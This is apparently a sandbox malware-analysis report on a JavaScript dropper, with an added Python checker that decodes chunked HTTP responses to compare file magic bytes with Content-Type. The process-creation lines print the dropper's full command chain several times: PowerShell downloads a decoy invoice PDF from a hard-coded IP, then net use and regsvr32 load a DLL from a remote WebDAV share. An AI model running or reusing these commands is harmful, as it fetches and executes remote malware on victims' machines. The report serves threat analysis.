    Source: httpBad PDF prefix: HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Wed, 15 Jan 2025 07:13:08 GMT Content-Type: application/pdf Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Data Raw: 31 66 36 61 0d 0a 25 50 44 46 2d 31 2e 37 0a 25 bf f7 a2 fe 0a 31 20 30 20 6f 62 6a 0a 3c 3c 20 2f 50 61 67 65 73 20 33 20 30 20 52 20 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 20 30 20 6f 62 6a 0a 3c 3c 20 2f 54 79 70 65 20 2f 4f 62 6a 53 74 6d 20 2f 4c 65 6e 67 74 68 20 35 36 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4e 20 31 20 2f 46 69 72 73 74 20 34 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 33 56 30 e0 b2 b1 51 d0 77 ce 2f cd 2b 51 30 54 d0 f7 ce 4c 29 56 88 56 30 51 30 50 08 52 88 55 d0 0f a9 2c 48 55 d0 0f 48 4c 4f 2d 56 b0 b3 e3 02 00 25 30 0c 6d 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 20 2f 43 6f 6e 74 65 6e 74 73 20 35 20 30 20 52 20 2f 47 72 6f 75 70 20 3c 3c 20 2f 43 53 20 2f 44 65 76 69 63 65 52 47 42 20 2f 49 20 74 72 75 65 20 2f 53 20 2f 54 72 61 6e 73 70 61 72 65 6e 63 79 20 2f 54 79 70 65 20 2f 47 72 6f 75 70 20 3e 3e 20 2f 4d 65 64 69 61 42 6f 78 20 5b 20 30 20 30 20 35 39 34 2e 39 36 20 38 34 30 2e 39 36 20 5d 20 2f 50 61 72 65 6e 74 20 33 20 30 20 52 20 2f 52 65 73 6f 75 72 63 65 73 20 36 20 30 20 52 20 2f 53 74 72 75 63 74 50 61 72 65 6e 74 73 20 30 20 2f 54 79 70 65 20 2f 50 61 67 65 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 35 20 30 20 6f 62 6a 0a 3c 3c 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4c 65 6e 67 74 68 20 37 35 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 33 54 30 00 42 5d 43 20 61 61 62 a0 67 69 a6 90 9c cb 55 c8 65 a8 00 82 45 e9 0a fa 89 06 0a e9 c5 5c 20 45 a6 96 26 40 79 43 a8 3a a0 6c aa 42 1a 57 a0 42 21 50 39 44 95 82 7e 85 b9 82 4b 3e 57 20 10 02 00 26 99 12 f1 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 36 20 30 20 6f 62 6a 0a 3c 3c 20 2f 45 78 74 47 53 74 61 74 65 20 3c 3c 20 2f 61 30 
20 3c 3c 20 2f 43 41 20 31 20 2f 63 61 20 31 20 3e 3e 20 3e 3e 20 2f 58 4f 62 6a 65 63 74 20 3c 3c 20 2f 78 37 20 37 20 30 20 52 20 3e 3e 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 37 20 30 20 6f 62 6a 0a 3c 3c 20 2f 42 42 6f 78 20 5b 20 30 20 30 20 35 39 35 20 38 34 31 20 5d 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 52 65 73 6f 75 72 63 65 73 20 38 20 30 20 52 20 2f 53 75 62 74 79 70 65 20 2f 46 6f 72 6d 20 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 20 2f 4c 65 6e 67 74 68 20 35 39 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 2b e4 0a 54 28 e4 d2 4f 2f 36 50 48 2f e6 2a e4 32 b5 34 d1 b3 34 53 30 00 42 5d 0b 13 03 08 1b ca 48 ce e5 d2 4f 04 a9 53 d0 af 30 34 54 70 c9 e7 0a 04 42 00 f1 ec 0e 9e 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 38 20 30 20 6f 62 6a 0a 3c 3c 20 2f 45 78 74 47 53 74 61 74 65 20 3c 3c 20 2f 61 30 20 3c 3c 20 2f 43 41 20 31 20 2f 63 61 20 31 20 3e 3e 20 2f 67 73 30 20 3c 3c 20 2f 42 4d 20 2f 4e 6f 72 6d 61 6c 20 2f 43 41 20 31 2e 30 20 2f 53 4d 61 73 6b 20 2f 4e 6f 6e 65 20 2f 6
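A caveat on the "Bad PDF prefix" finding above (and on the "Downloads files with wrong headers with respect to MIME Content-Type" signature it feeds): the response is sent with `Transfer-Encoding: chunked`, and the raw bytes in the dump begin `31 66 36 61 0d 0a` ("1f6a\r\n", the first chunk-size line) followed immediately by `25 50 44 46 2d 31 2e 37` ("%PDF-1.7"). The decoy is therefore a real PDF by its magic bytes; the signature fired on the chunk framing, not on a mismatched file type. The following checker is an added example written for this page, not Joe Sandbox code: it parses a captured HTTP response, strips the chunked framing per RFC 9112, and only then compares the magic bytes with the declared Content-Type. The status line and headers are copied from the dump; the PDF body is constructed (cut after the first object and re-chunked in small pieces, so the chunk sizes are not the 0x1f6a seen on the wire), and a second constructed response shows the case that should actually alarm an analyst, a PE image served under a PDF Content-Type.

```python
"""Check a captured HTTP download the way the "Bad PDF prefix" signature does,
but after removing chunked transfer framing, so the magic bytes are compared
with the Content-Type rather than with the chunk-size line.

Status line and headers are copied from the report's raw dump; the bodies are
constructed for this example.
"""

MAGIC = {"pdf": b"%PDF-", "pe": b"MZ", "zip": b"PK\x03\x04"}
# What each declared Content-Type should start with once decoded.
EXPECTED_FOR_TYPE = {"application/pdf": "pdf", "application/x-msdownload": "pe",
                     "application/zip": "zip"}


def sniff(data: bytes):
    """Return the magic-byte family of data ('pdf', 'pe', 'zip') or None."""
    for name, sig in MAGIC.items():
        if data.startswith(sig):
            return name
    return None


def parse_response(raw: bytes):
    """Split an HTTP/1.1 response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status, *lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return status, headers, body


def dechunk(body: bytes) -> bytes:
    """Decode Transfer-Encoding: chunked (RFC 9112 section 7.1); trailers are ignored."""
    out, pos = bytearray(), 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";", 1)[0], 16)   # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)                              # last-chunk
        out += body[pos:pos + size]
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("malformed chunk: missing CRLF after data")
        pos += 2


def check_download(raw: bytes) -> dict:
    """Compare the decoded body's magic bytes with the declared Content-Type."""
    status, headers, body = parse_response(raw)
    ctype = headers.get("content-type", "").split(";", 1)[0].strip().lower()
    chunked = headers.get("transfer-encoding", "").lower() == "chunked"
    decoded = dechunk(body) if chunked else body
    expected = EXPECTED_FOR_TYPE.get(ctype)
    return {
        "status": status,
        "content_type": ctype,
        "sniffed_raw": sniff(body),      # what a check on the wire bytes sees
        "sniffed": sniff(decoded),       # after the chunk framing is removed
        "matches_content_type": (sniff(decoded) == expected) if expected else None,
        "decoded_length": len(decoded),
    }


HEADERS = (b"HTTP/1.1 200 OK\r\nServer: nginx/1.22.1\r\nDate: Wed, 15 Jan 2025 07:13:08 GMT\r\n"
           b"Content-Type: application/pdf\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\n"
           b"X-Frame-Options: SAMEORIGIN\r\n\r\n")
# First bytes of the decoy as dumped in the report (%PDF-1.7, binary comment line,
# the catalog object); everything after "endobj" is omitted here (constructed cut).
PDF_PREFIX = b"%PDF-1.7\n%\xbf\xf7\xa2\xfe\n1 0 obj\n<< /Pages 3 0 R /Type /Catalog >>\nendobj\n"


def chunk(payload: bytes, size: int = 16) -> bytes:
    """Apply chunked framing: hex size, CRLF, data, CRLF ... then the 0 last-chunk."""
    parts = [payload[i:i + size] for i in range(0, len(payload), size)]
    return b"".join(b"%x\r\n%s\r\n" % (len(p), p) for p in parts) + b"0\r\n\r\n"


DECOY_PDF_RESPONSE = HEADERS + chunk(PDF_PREFIX)
# Same headers, but a PE image as body: a DLL served under a PDF Content-Type (constructed).
MISLABELLED_RESPONSE = HEADERS + chunk(b"MZ\x90\x00" + bytes(60))

if __name__ == "__main__":
    for name, raw in (("decoy pdf", DECOY_PDF_RESPONSE), ("mislabelled", MISLABELLED_RESPONSE)):
        print(name, check_download(raw))
```

For the decoy, `sniffed_raw` is None (the wire bytes start with a chunk-size line) while `sniffed` is "pdf", which is exactly the discrepancy behind the sandbox signature; the real payload of this chain is the DLL fetched over WebDAV on port 8888, which never passes through this HTTP GET at all.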
    Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 8888
    Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49705
    Source: global traffic | TCP traffic: 192.168.2.5:49705 -> 193.143.1.205:8888
    Source: global traffic | TCP traffic: 192.168.2.5:56370 -> 1.1.1.1:53
    Source: Joe Sandbox View | IP Address: 193.143.1.205
    Source: Joe Sandbox View | ASN Name: BITWEB-ASRU
    Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49704 -> 193.143.1.205:80
    Source: global traffic | HTTP traffic detected: GET /invoice.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 193.143.1.205 | Connection: Keep-Alive
    Source: unknown | TCP traffic detected without corresponding DNS query: 193.143.1.205 (reported 50 times; the C2 address is hard-coded, no hostname is ever resolved)
    Source: global traffic | HTTP traffic detected: GET /invoice.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 193.143.1.205 Connection: Keep-Alive
    Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
    Source: wscript.exe, 00000000.00000003.2066282974.0000021FBBFFF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.143.1.205/invoice.php
    Source: net.exe, 00000007.00000003.2123672131.000001C0D456A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.2124471907.000001C0D458F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.143.1.205:8888/
    Source: net.exe, 00000007.00000002.2124383639.000001C0D4538000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.143.1.205:8888/tem
    Source: svchost.exe, 00000009.00000002.3359525408.0000018F90800000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
    Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: qmgr.db.9.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
    Source: qmgr.db.9.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
    Source: qmgr.db.9.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
    Source: qmgr.db.9.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
    Source: qmgr.db.9.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
    Source: qmgr.db.9.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
    Source: qmgr.db.9.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
    Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.dr | String found in binary or memory: http://x1.i.lencr.org/
    Source: edb.log.9.dr, qmgr.db.9.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
    Source: svchost.exe, 00000009.00000003.2123576965.0000018F906F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
    Source: qmgr.db.9.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:

    Spam, unwanted Advertisements and Ransom Demands

    Source: Yara match | File source: Process Memory Space: wscript.exe PID: 320, type: MEMORYSTR

    System Summary

    Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
    Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
    Source: 1475127682155276.js | Initial sample: Strings found which are bigger than 50
    Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winJS@27/55@1/2
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2e55z2ht.acm.ps1
    Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: 1475127682155276.js | Virustotal: Detection: 9%
    Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js"
    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1680,i,15353841458623981023,14574021241036116658,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1680,i,15353841458623981023,14574021241036116658,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
    Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: propsys.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: edputil.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: windows.staterepositoryps.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: wintypes.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: policymanager.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: msvcp110_win.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: appresolver.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: bcp47langs.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: slc.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: sppc.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: pcacli.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: mpr.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: sfc_os.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\net.exe | Section loaded: mpr.dll
    Source: C:\Windows\System32\net.exe | Section loaded: wkscli.dll
    Source: C:\Windows\System32\net.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\net.exe | Section loaded: samcli.dll
    Source: C:\Windows\System32\net.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\net.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\net.exe | Section loaded: drprov.dll
    Source: C:\Windows\System32\net.exe | Section loaded: winsta.dll
    Source: C:\Windows\System32\net.exe | Section loaded: ntlanman.dll
    Source: C:\Windows\System32\net.exe | Section loaded: davclnt.dll
    Source: C:\Windows\System32\net.exe | Section loaded: davhlpr.dll
    Source: C:\Windows\System32\net.exe | Section loaded: winhttp.dll
    Source: C:\Windows\System32\net.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\net.exe | Section loaded: dhcpcsvc6.dll
